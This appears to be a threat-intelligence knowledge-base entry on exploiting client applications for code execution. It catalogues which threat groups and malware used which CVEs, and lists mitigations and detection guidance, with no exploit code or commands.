Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
ID | Name | Description |
---|---|---|
G0018 | admin@338 |
admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.[1] |
S0331 | Agent Tesla |
Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.[2] |
G0138 | Andariel |
Andariel has exploited numerous ActiveX vulnerabilities, including zero-days.[3][4][5] |
G1007 | Aoqin Dragon |
Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.[6] |
G0005 | APT12 |
APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).[7][8] |
G0007 | APT28 |
APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.[9] |
G0016 | APT29 |
APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.[10][11][12] |
G0022 | APT3 |
APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.[13][14] |
G0050 | APT32 |
APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)[15] |
G0064 | APT33 |
APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).[16][17] |
G0067 | APT37 |
APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.[18][19][20][21] |
G0096 | APT41 |
APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[22] |
G0001 | Axiom |
Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.[23] |
S0239 | Bankshot |
Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.[24] |
G1002 | BITTER |
BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.[25][26] |
G0098 | BlackTech |
BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.[27] |
G0060 | BRONZE BUTLER |
BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.[28][29] |
G0080 | Cobalt Group |
Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.[30][31][32][33][34][35][36][37] |
S0154 | Cobalt Strike |
Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.[38][39] |
G0142 | Confucius |
Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.[40][41] |
G0012 | Darkhotel |
Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.[42] |
S0243 | DealersChoice |
DealersChoice leverages vulnerable versions of Flash to perform execution.[43] |
G0035 | Dragonfly |
Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.[44] |
G0066 | Elderwood |
Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.[45] |
G1003 | Ember Bear |
Ember Bear has used exploits to enable follow-on execution of frameworks such as Meterpreter.[46] |
S0396 | EvilBunny |
EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.[47] |
G1011 | EXOTIC LILY |
EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.[48] |
C0001 | Frankenstein |
During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.[49] |
S0391 | HAWKBALL |
HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.[50] |
G0126 | Higaisa | |
G0100 | Inception |
Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.[52][53][54][55] |
S0260 | InvisiMole |
InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.[56] |
G0032 | Lazarus Group |
Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[24] |
G0065 | Leviathan |
Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[57][58][59][60] |
G0069 | MuddyWater |
MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.[61] |
G0129 | Mustang Panda |
Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[62] |
C0016 | Operation Dust Storm |
During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.[63] |
G0040 | Patchwork |
Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.[64][65][66][67][68][69][70] |
S0458 | Ramsay |
Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.[71][72] |
G1031 | Saint Bear |
Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.[73] |
G0034 | Sandworm Team |
Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).[74][75][76] |
G0121 | Sidewinder |
Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.[77][78] |
S0374 | SpeakUp |
SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. [79] |
S0578 | SUPERNOVA |
SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).[80][81] |
G0062 | TA459 |
TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.[82] |
G0089 | The White Company |
The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.[83] |
G0027 | Threat Group-3390 |
Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.[84] |
G0131 | Tonto Team |
Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.[85][86][87][88] |
G0134 | Transparent Tribe |
Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.[89] |
G0081 | Tropic Trooper |
Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.[90][91] |
S1154 | VersaMem |
VersaMem was installed through exploitation of CVE-2024-39717 in Versa Director servers.[92] |
S1065 | Woody RAT |
Woody RAT has relied on CVE-2022-30190 (Follina) for execution during delivery.[93] |
S0341 | Xbash |
Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.[94][95] |
ID | Mitigation | Description |
---|---|---|
M1048 | Application Isolation and Sandboxing |
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. [96] [97] Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. Risks of additional exploits and weaknesses in those systems may still exist. [97] |
M1050 | Exploit Protection |
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. [98] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. [99] Many of these protections depend on the architecture and target application binary for compatibility. |
M1051 | Update Software |
Perform regular software updates to mitigate exploitation risk. Keeping software up-to-date with the latest security patches helps prevent adversaries from exploiting known vulnerabilities in client software, reducing the risk of successful attacks. |
ID | Data Source | Data Component | Detects |
---|---|---|---|
DS0015 | Application Log | Application Log Content |
Monitor log entries from browsers, Office applications, and third-party applications for suspicious behavior, such as crashes, abnormal terminations, or instability that could indicate an attempted exploit. Analytic 1 - logs related to application crashes or unexpected behavior, which could signal an attempt to exploit vulnerabilities.
|
DS0022 | File | File Modification |
Monitor file system changes associated with exploitation, such as suspicious files dropped by browsers, Office apps, or third-party programs, which can be used for further stages of attack. Analytic 1 - identifies file creations or modifications associated with commonly exploited software
|
DS0029 | Network Traffic | Network Traffic Flow |
Look for unusual outbound connections following abnormal process execution, as this could indicate an adversary has established a foothold and is initiating communication with C2 infrastructure. Analytic 1 - monitors for network traffic generated by exploited processes
|
DS0009 | Process | Process Creation |
Identify abnormal child processes spawned by applications commonly targeted by exploits, such as browsers or Office programs, particularly those launched with suspicious arguments or into unknown directories. Example, it is not expected behavior for print spool service to be executing discovery type processes. However, this is one example and could be any number of native or third party processes that are executing either unusual or unknown (potentially adversary brought) processes. Note:- Analytic 1, look for instances where Office Applications (e.g., Word, Excel, PowerPoint) are launched with suspicious parameters or from unusual locations- Analytic 2, look for abnormal child process creation by Office Applications especially when accompanied by suspicious command-line parameters Analytic 1 - Office Application Process Execution
Analytic 2 - Unusual Child Process Creation
|